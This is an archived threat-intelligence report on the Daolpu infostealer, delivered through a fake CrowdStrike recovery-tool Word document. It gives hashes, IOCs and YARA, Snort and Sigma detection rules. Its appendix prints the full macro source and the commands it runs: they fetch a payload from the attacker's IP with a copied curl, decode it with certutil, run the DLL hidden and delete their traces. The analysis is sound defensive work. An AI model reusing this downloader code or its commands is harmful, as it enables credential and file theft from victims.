{
	"id": "9d1b0ca8-fd30-40a2-9d5e-3314e3952111",
	"created_at": "2026-04-10T03:21:23.874274Z",
	"updated_at": "2026-04-10T13:11:44.170025Z",
	"deleted_at": null,
	"sha1_hash": "064281f0893bf17ff0aac2cf83baf81fd68b7d0f",
	"title": "Daolpu Infostealer: Full analysis of the latest malware exploited post CrowdStrike outage",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 138833,
	"plain_text": "Daolpu Infostealer: Full analysis of the latest malware exploited\r\npost CrowdStrike outage\r\nBy Katuiscia Benloukil\r\nPublished: 2024-07-25 · Archived: 2026-04-10 02:41:19 UTC\r\nWhile we all stand in unity with cyber and IT teams who have been working tirelessly to restore systems\r\nfollowing last week’s CrowdStrike patch failure, cyber criminals continue to exploit the situation by launching\r\nphishing campaigns.\r\nDiscovered on July 24th, 2024, the latest malware on the list is: Daolpu. A Word document containing macros that\r\ndownload an unidentified stealer now tracked as Daolpu.\r\nMacroviruses exploit the macro scripting capabilities of office applications like Microsoft Word and Excel to\r\nembed malicious code within document files. These viruses spread rapidly through email attachments and shared\r\ndocuments, making them a persistent threat in various environments. This paper provides a detailed technical\r\nanalysis of macrovirus evolution, infection mechanisms, and current detection and mitigation strategies. The\r\ncurrent malware sample exploits the opportunity presented by a recent CrowdStrike outage to deliver its payload\r\nusing a weaponized Word document. By leveraging this context, attackers might exploit the surge in attempts to\r\nrepair the issue and the appearance of legitimacy to perform their attack. Once opened, the weaponized document\r\ndownloads and executes a stealer.\r\nDaolpu is one of the quickest malware strains to exploit the window of opportunity. 
The following timeline shows\r\nhow reactive the threat actors were following the incident:\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 1 of 30\n\nTimeline of malware creation over time\r\nIn this report, the TEHTRIS Threat Intel team exposes the mechanisms of the Daolpu stealer in depth.\r\nAnalyst opinion\r\nThe sample lacks obfuscation and evasion techniques, likely due to the short window of opportunity created by\r\nthe recent CrowdStrike outage. It is estimated that the development of this tool took less than two days, suggesting\r\nthat the malware was hastily crafted specifically to exploit this temporary vulnerability. This rapid development\r\ncycle indicates a targeted approach, focusing on immediate deployment rather than long‑term stealth and\r\npersistence. Consequently, the malware’s straightforward design highlights its purpose‑built nature for this\r\nparticular attack scenario.\r\nSamples\r\nIn the following section, we will provide a detailed examination of each malicious file involved in the attack. 
This\r\nanalysis includes file names, hashes, sizes, and other relevant attributes.\r\nTable 1: “New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm”\r\nType Value\r\nFile Type Microsoft Word 2007+\r\nDateTimestamp N/A\r\nSIZE 303K\r\nMD5 dd2100dfa067caae416b885637adc4ef\r\nSHA256 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61\r\nTable 2: “ThisDocument.cls”\r\nType Value\r\nFile Type ASCII text, with very long lines (470)\r\nDateTimestamp N/A\r\nSIZE 17K\r\nMD5 cc7c247c00295665aed802b30f1793c\r\nSHA256 6d3f611353c7fc8aa65b48b3bc054682aad6b2d7c1321f4fb1b6ed98bb88aa9d\r\nTable 3: “http://172.104.160.126:8099/payload2.txt”\r\nType Value\r\nFile Type PEM certificate\r\nDateTimestamp N/A\r\nSIZE 1.9M\r\nMD5 d67ea3b362d4e9b633216e85ac643d1f\r\nSHA256 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721\r\nTable 4: “mscorsvc.dll”\r\nType Value\r\nFile Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows, 7 sections\r\nDateTimestamp 2024-07-19 08:10:10\r\nSIZE 1.4M\r\nMD5 eb29329de4937b34f218665da57bcef4\r\nSHA256 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a\r\nThe following schema provides a detailed illustration of the infection chain with the associated MITRE ATT\u0026CK techniques,\r\noffering a step‑by‑step breakdown of how the attack unfolds to clarify the interactions and dependencies between\r\nthe various components previously listed.\r\nCode details\r\nThe script of the macrovirus has been fully extracted and can be found in the appendices.\r\nThe executable has been compiled using Visual Studio 2019 (version 14.39/33519) with debug symbols stripped,\r\nresulting in a Program Database (PDB) file. 
Despite the removal of debug symbols, the PDB file contains\r\nmetadata that can be leveraged to detect the malware (cf. the YARA section).\r\nFigure 1: HTTP request to download stage2\r\nTechniques\r\nThe next picture details the MITRE ATT\u0026CK techniques utilized by the malware sample and each of its\r\ncomponents: Phishing, User Execution, Deobfuscate/Decode Files or Information, Automated Collection, Data\r\nfrom Local System, Ingress Tool Transfer, Non‑Standard Port, Web Service, Automated Exfiltration, Exfiltration\r\nOver Web Service, and Financial Theft.\r\nContext\r\nThe next schema illustrates the STIX2 representation of the attack, providing a structured and standardized format\r\nfor describing the incident. The raw JSON data is available in the appendices.\r\nExecution\r\nInitial execution\r\nThe initial payload is a DOCM file, spread through a phishing campaign. For the CrowdStrike fix to be relevant, it\r\nmust target relatively large companies, as these organizations typically have antispam countermeasures in place\r\nthat should block such threats. The attackers likely aimed at exploiting the temporary lapse in security to bypass\r\nthese defenses and deliver their payload. 
The number of potential victims should be low.\r\nThe macro is executed by the script ThisDocument.cls:Document_Open at the opening of the document. By\r\ndefault, the user must enable macro execution in Word; once this is done, the malicious payload is executed without\r\nadditional user interaction.\r\nThe next screenshot is from the TEHTRIS sandbox, captured immediately after the infection. This image\r\nhighlights the initial impact of the malware, while subsequent execution phases occur in the background. This\r\nprovides an early glimpse into the malware’s behavior before it fully executes its payload.\r\nFigure 2: Document preview on the victim side\r\nSensitive data\r\nBecause the malware is a stealer, its sole goal is to collect and exfiltrate data. It focuses on gathering sensitive\r\ninformation from the infected system and transmitting it to the attacker’s server, ensuring that the stolen data can\r\nbe used for malicious purposes such as identity theft or financial fraud.\r\nCollection\r\nThe malware automatically exfiltrates credentials from the following browsers: Mozilla Firefox, Microsoft Edge,\r\nGoogle Chrome, and Coc Coc Browser. The inclusion of Coc Coc Browser, which is popular in Vietnam, may\r\nindicate that the campaign specifically targets Vietnamese entities.\r\nFigure 3: Supported Browsers\r\nThe malware also crawls the disk seeking sensitive documents, exfiltrating every file that matches the following\r\nextensions: .doc, .docx, .xls, .xlsx, .pdf, .txt, .ppt, and .pptx. 
By targeting these common document formats, the\r\nmalware aims to gather a wide range of potentially valuable and sensitive information.\r\nCredentials\r\nThe malware extracts passwords and sensitive data from the previously cited browsers. This sensitive information\r\nis collected into a file prior to its exfiltration, ensuring that all gathered credentials and personal data are\r\nconsolidated and ready for transmission to the attacker’s server.\r\nFigure 4: Results file\r\nTo collect Firefox credentials, the malware uses the mozglue library to parse the Firefox configuration. This\r\nallows the malware to efficiently access and extract stored login information and other sensitive data from the\r\nbrowser’s internal files.\r\nFigure 5: Use of Firefox Libraries\r\nExfiltration\r\nThe exfiltration is performed automatically over an HTTP channel using multipart POST uploads. The lack of\r\nencryption suggests that the malware was developed in a hurry, as it does not implement basic security measures\r\nto protect the transferred data, making it more vulnerable to interception and analysis.\r\nFigure 6: HTTP exfiltration\r\nCommand and control\r\nIdentification\r\nThe Command and Control (C2) server is hosted by Linode LLC, a cloud provider. 
The attacker likely purchased\r\na Virtual Private Server (VPS) from Linode to conduct their attack.\r\nFigure 7: IP lookup of the C2\r\nTo uniquely identify the victim, the malware uses the MAC address as part of the host fingerprint. This approach\r\nensures that each infected system can be individually tracked based on its network hardware address.\r\nFigure 8: HTTP request to download stage2\r\nThe C2 server was down at the time of the analysis.\r\nCommands\r\nNo commands are exchanged with the C2; the sensitive information is sent in a one‑way stream from the stealer to\r\nthe C2 server. This means that the malware simply transmits collected data without receiving any instructions or\r\nupdates from the attacker.\r\nCryptography\r\nNo cryptographic mechanisms have been implemented in the sample.\r\nIOCs\r\nURLs\r\nhttp://172 [dot] 104.160.126:8099/payload2.txt\r\nhttp://172 [dot] 104.160.126:5000/Uploadss\r\nFiles and registry\r\nC:\\Windows\\Temp\\cookies.sqlite-shm\r\nC:\\Windows\\Temp\\login data\r\nC:\\Windows\\Temp\\result.txt\r\nC:\\Windows\\Temp\\Login Data\r\nC:\\Windows\\Temp\\cookies.sqlite\r\nC:\\Windows\\Temp\\cookies.sqlite-wal\r\nArtifacts\r\nSubcommands do not capture stdout and stderr and may leak information (lazy system invocation):\r\nFigure 9: Leaks from commands\r\nSimilar samples\r\nOther samples of the same malware have been spotted in our intelligence database. 
Here are the SHA-256 hashes\r\nof these samples:\r\n4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a\r\n3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8\r\nf0fce67c1f360d045c21249f6faaac4d64b36aad02c8b877ab7db1e35f7c71f5\r\nDetection\r\nYARA\r\nWe did not manage to write a YARA signature for the macrovirus. The Snort and Sigma rules will eventually spot them.\r\nimport \"pe\"\r\nrule DaolpuStealer {\r\n    meta:\r\n        author = \"PEZIER Pierre-Henri. Copyright TEHTRIS 2024\"\r\n    strings:\r\n        $str_01 = \"\\\\Temp\\\\result.txt\" fullword\r\n        $str_02 = \"docx\" wide fullword\r\n        $str_03 = \"xlsx\" wide fullword\r\n        $str_04 = \"doc\" wide fullword\r\n        $str_05 = \"xls\" wide fullword\r\n        $str_06 = \"ppt\" wide fullword\r\n        $str_07 = \"pptx\" wide fullword\r\n        $str_08 = \"pdf\" wide fullword\r\n        $str_09 = \"txt\" wide fullword\r\n    condition:\r\n        pe.is_pe and\r\n        (\r\n            pe.pdb_path matches /Mal_Cookie.*mscorsvc.pdb$/\r\n            or all of ($str*)\r\n        )\r\n}\r\nSnort\r\nThe macrovirus and stealer implant will be detected easily by the following rules:\r\nalert http any any -\u003e any any (\\\r\n    sid: 110000002;\\\r\n    msg: \"Download certificate encoded PE Executable\";\\\r\n    metadata: author PEZIER Pierre-Henri. Copyright TEHTRIS 2024;\\\r\n    content: \"-----BEGIN CERTIFICATE-----\"; startswith; isdataat:0, relative;\\\r\n    content: \"TVqQ\"; within: 10;\\\r\n    classtype: file-format;\\\r\n    rev: 1;)\r\nalert http any any -\u003e any any (\\\r\n    sid: 110000003;\\\r\n    msg: \"Daolpu stealer\";\\\r\n    metadata: author PEZIER Pierre-Henri. 
Copyright TEHTRIS 2024;\\\r\n    content:\"POST\"; http_method; http.uri; content:\"/Uploadss\";\\\r\n    classtype: file-format;\\\r\n    rev: 1;)\r\nSigma\r\nThe following Sigma rule detects the DLL behavior.\r\ntitle: Daolpu stealer\r\nid: 008ee86c-ea30-4cb9-a1cf-d8f733e8502d\r\ndescription: Daolpu stealer\r\nauthor: TEHTRIS - Pezier Pierre-Henri\r\ndate: 2024-07-24\r\ntags:\r\n    - detection.threat_hunting\r\nlogsource:\r\n    category: file_access\r\n    product: windows\r\ndetection:\r\n    source_process:\r\n        - Image|endswith: '\\rundll32.exe'\r\n    results_file:\r\n        - TargetFileName: 'C:\\Windows\\Temp\\result.txt'\r\n        - TargetFileName: 'C:\\Windows\\Temp\\Login Data'\r\n        - TargetFileName: 'C:\\Windows\\Temp\\cookies.sqlite'\r\n        - TargetFileName: 'C:\\Windows\\Temp\\cookies.sqlite-wal'\r\n        - TargetFileName: 'C:\\Windows\\Temp\\cookies.sqlite-shm'\r\n    condition: results_file and source_process\r\nfalsepositives:\r\n    - Unknown\r\nlevel: critical\r\nAppendix\r\nOffice document macro\r\nCommands run by the macro:\r\nxcopy C:\\Windows\\System32\\curl.exe C:\\Users\\admin\\AppData\\Local\\Temp\r\ncertutil -f -encode C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe C:\\Users\\admin\\AppData\\Local\\Temp\\curl.txt\r\ncertutil -f -decode C:\\Users\\admin\\AppData\\Local\\Temp\\curl.txt C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe\r\nC:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\\Users\\admin\\AppData\\L\r\ncertutil -f -decode C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.txt C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.d\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\curl.txt\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.txt\r\nSTART \" \" rundll32 C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.dll, DllMain\r\nexit\r\nSource code of ThisDocument.cls:\r\n' Declare PtrSafe Sub Sleep Lib \"kernel32\" (ByVal dwMilliseconds As LongPtr)\r\n' Declare Sub Sleep Lib \"kernel32\" (ByVal dwMilliseconds As Long)\r\n' Sub ChangeText()\r\n' ActiveDocument.Words(19).Text = \"The \"\r\n' End Sub\r\nSub DeleteText()\r\n ' Dim rngFirstParagraph As Range\r\n \r\n ' Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range\r\n ' With rngFirstParagraph\r\n ' .Delete\r\n ' .InsertAfter Text:=\"New text\"\r\n ' .InsertParagraphAfter\r\n ' End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Fourth paragraph displayed \" + Chr(34)\r\n .InsertParagraphAfter\r\n End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Fifth paragraph displayed\"\r\n .InsertParagraphAfter\r\n End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Sixth paragraph displayed\"\r\n .InsertParagraphAfter\r\n End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Seventh paragraph displayed\"\r\n .InsertParagraphAfter\r\n End With\r\n For i = 1 To ActiveDocument.Paragraphs.Count\r\n ' ActiveDocument.Paragraphs(i).Style = wdStyleNormal\r\n Set myRange = ActiveDocument.Paragraphs(i).Range\r\n With myRange.Font\r\n ' .Bold = True\r\n .Name = \"Times New Roman\"\r\n .Size = 14\r\n End With\r\n Next i\r\nEnd Sub\r\nSub ShowErrorText()\r\n Dim rngFirstParagraph As Range\r\n \r\n Set 
rngFirstParagraph = ActiveDocument.Paragraphs(4).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n .InsertParagraphAfter\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n .InsertParagraphAfter\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\r\n .InsertParagraphAfter\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + C\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + 
ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \"\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n .InsertParagraphAfter\r\n End With\r\nEnd Sub\r\n'Show msgbox\r\nSub MsgFunc()\r\n Dim Msg, Style, Title, Help, Ctxt, Response, MyString\r\n Msg = \"The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?\"\r\n Style = vbYesNo Or vbCritical Or vbDefaultButton2 ' Define buttons.\r\n Title = \"Missing font\" ' Define title.\r\n Help = \"DEMO.HLP\" ' Define Help file.\r\n Ctxt = 1000 ' Define topic context.\r\n ' Display message.\r\n Response = MsgBox(Msg, Style, Title, Help, Ctxt)\r\n If Response = vbYes Then ' User chose Yes.\r\n MyString = \"Yes\" ' Perform some action.\r\n DeleteText\r\n Else ' User chose No.\r\n MyString = \"No\" ' Perform some action.\r\n 'MsgFunc\r\n End If\r\nEnd Sub\r\nSub MainFunc()\r\n Dim curl_enc_txt_path As String\r\n Dim curl_dec_exe_path As String\r\n Dim mal_enc_txt_url As String\r\n Dim mal_enc_txt_path As String\r\n Dim mal_dec_exe_path As String\r\n Dim pp As String\r\n Dim cc As String\r\n Dim dir As String\r\n Dim host As String\r\n dir = ActiveDocument.Path\r\n dir = Environ(\"temp\")\r\n host = \"http://172.104.160.126:8099\"\r\n curl_enc_txt_path = dir + \"\\curl.txt\"\r\n curl_dec_exe_path = dir + \"\\curl.exe\"\r\n mal_enc_txt_url = host + \"/payload2.txt\"\r\n mal_enc_txt_path = dir + \"\\mscorsvc.txt\"\r\n mal_dec_exe_path = dir + \"\\mscorsvc.dll\"\r\n pp = pp + \"C:\\Windows\\Sys\"\r\n pp = pp + \"tem32\\cmd.exe /c \"\r\n cc = cc + 
curl_enc_txt_path + curl_dec_exe_path\r\n pp = pp + \"xcopy C:\\Windows\\Sys\"\r\n cc = cc + curl_enc_txt_path + mal_enc_txt_url\r\n pp = pp + \"tem32\\cu\" + \"rl.exe \" + dir + \" \u0026 \"\r\n cc = cc + mal_enc_txt_path + mal_enc_txt_url\r\n pp = pp + \"certutil -f \"\r\n cc = cc + mal_enc_txt_path + mal_dec_exe_path\r\n pp = pp + \"-encode \" + dir + \"\\cu\" + \"rl.exe \" + curl_enc_txt_path + \" \u0026 \"\r\n cc = cc + pp + mal_dec_exe_path\r\n pp = pp + \"certutil -f \"\r\n cc = cc + pp + dir\r\n pp = pp + \"-decode \" + curl_enc_txt_path + \" \" + curl_dec_exe_path + \" \u0026 \"\r\n cc = cc + curl_enc_txt_path + dir\r\n pp = pp + curl_dec_exe_path + \" \" + mal_enc_txt_url + \" -o \" + mal_enc_txt_path + \" \u0026 \"\r\n cc = cc + curl_enc_txt_path + dir\r\n pp = pp + \"certutil -f \"\r\n cc = cc + curl_enc_txt_path + curl_dec_exe_path\r\n pp = pp + \"-decode \" + mal_enc_txt_path + \" \" + mal_dec_exe_path + \" \u0026 \"\r\n cc = cc + mal_enc_txt_url + curl_dec_exe_path\r\n pp = pp + \"del \" + dir + \"\\cu\" + \"rl.exe \u0026 \"\r\n cc = cc + host + pp + curl_enc_txt_path\r\n pp = pp + \"del \" + curl_enc_txt_path + \" \u0026 \"\r\n cc = cc + curl_enc_txt_path + dir\r\n pp = pp + \"del \" + curl_dec_exe_path + \" \u0026 \"\r\n cc = cc + curl_dec_exe_path + pp\r\n pp = pp + \"del \" + mal_enc_txt_path + \" \u0026 \"\r\n cc = cc + mal_enc_txt_path + pp\r\n Dim vbDblQuote As String\r\n vbDblQuote = Chr(34)\r\n pp = pp + \"START \" + vbDblQuote + \" \" + vbDblQuote + \" rundll32 \" + mal_dec_exe_path + \",DllMain\" + \" \u0026 \"\r\n cc = cc + mal_dec_exe_path + pp\r\n pp = pp + \"exit\"\r\n cc = cc + dir + pp\r\n 'pp = pp + \"cmd.exe -d \u0026 exit\"\r\n 'cc = cc + mal_enc_txt_url + curl_dec_exe_path\r\n ' Shell (pp), vbHidden\r\n Dim objShell As Object\r\n Set objShell = CreateObject(\"WScript.Shell\")\r\n objShell.Run 
pp, 0, False\r\nEnd Sub\r\nSub Document_Open()\r\n MainFunc\r\nEnd Sub\r\nSTIX2 graph\r\n{\r\n  \"type\": \"bundle\",\r\n  \"id\": \"bundle--fe929ee2-13da-4c6a-8810-be8c061ab434\",\r\n  \"objects\": [\r\n    {\r\n      \"type\": \"campaign\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"campaign--c014b573-2a94-4c09-aaf9-2c5330dedb06\",\r\n      \"lang\": \"en\",\r\n      \"created\": \"2024-07-18T00:00:00.007Z\",\r\n      \"name\": \"Crawdstrike Fake Update\",\r\n      \"description\": \"CrowdStrike bug related phishing attack\"\r\n    },\r\n    {\r\n      \"type\": \"identity\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"identity--bdc38620-34da-418b-9b72-fc1ae34b398f\",\r\n      \"name\": \"CrowdStrike\",\r\n      \"identity_class\": \"organization\"\r\n    },\r\n    {\r\n      \"type\": \"malware\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\",\r\n      \"is_family\": false,\r\n      \"name\": \"Daolpu\",\r\n      \"created_by_ref\": \"file--3ad05b73-3251-4b41-beca-5de1accc9a5e\",\r\n      \"malware_types\": [\r\n        \"spyware\"\r\n      ],\r\n      \"capabilities\": [\r\n        \"steals-authentication-credentials\",\r\n        \"communicates-with-c2\",\r\n        \"exfiltrates-data\",\r\n        \"fingerprints-host\"\r\n      ],\r\n      \"sample_refs\": [\r\n        \"file--58970bff-b7a9-4b85-8c88-34c16a852e8e\",\r\n        \"file--26d5f6ec-cc77-4162-bdff-401a515689d7\",\r\n        \"file--ea34c3fe-1d5b-4cf6-92e1-7e02cd878242\"\r\n      ]\r\n    },\r\n    {\r\n      \"type\": \"malware\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n      \"is_family\": false,\r\n      \"name\": \"Daolpu Macrovirus\",\r\n      \"malware_types\": [\r\n        \"downloader\"\r\n      ],\r\n      \"sample_refs\": [\r\n        \"file--5760335e-071a-4267-af37-8ce39a563a10\"\r\n      ]\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--0974b3d8-9291-4e6c-9f07-4b20ea435278\",\r\n      \"name\": \"ThisDocument.cls\",\r\n      \"hashes\": {\r\n        \"SHA-256\": \"6d3f611353c7fc8aa65b48b3bc054682aad6b2d7c1321f4fb1b6ed98bb88aa9d\"\r\n      },\r\n      \"mime_type\": \"text/plain\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--5760335e-071a-4267-af37-8ce39a563a10\",\r\n      \"name\": \"New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm\",\r\n      \"hashes\": {\r\n        \"SHA-256\": \"803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61\"\r\n      },\r\n      \"mime_type\": \"application/msword\",\r\n      \"contains_refs\": \"file--0974b3d8-9291-4e6c-9f07-4b20ea435278\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--3ad05b73-3251-4b41-beca-5de1accc9a5e\",\r\n      \"name\": \"payload2.txt\",\r\n      \"hashes\": {\r\n        \"SHA-256\": \"5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721\"\r\n      },\r\n      \"mime_type\": \"text/plain\"\r\n    },\r\n    {\r\n      \"type\": \"url\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"url--af891d7d-9bcc-4fb4-9bed-5feb52908e24\",\r\n      \"value\": \"http://172.104.160.126:8099/payload2.txt\"\r\n    },\r\n    {\r\n      \"type\": \"url\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"url--0bae24fb-6bfd-483f-82a3-32cac7626dee\",\r\n      \"value\": \"http://172.104.160.126:8099/Uploadss\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--58970bff-b7a9-4b85-8c88-34c16a852e8e\",\r\n      \"name\": \"mscorsvc.dll\",\r\n      \"hashes\": {\r\n        \"SHA-256\": \"4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a\"\r\n      },\r\n      \"mime_type\": \"application/x-msdownload\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": 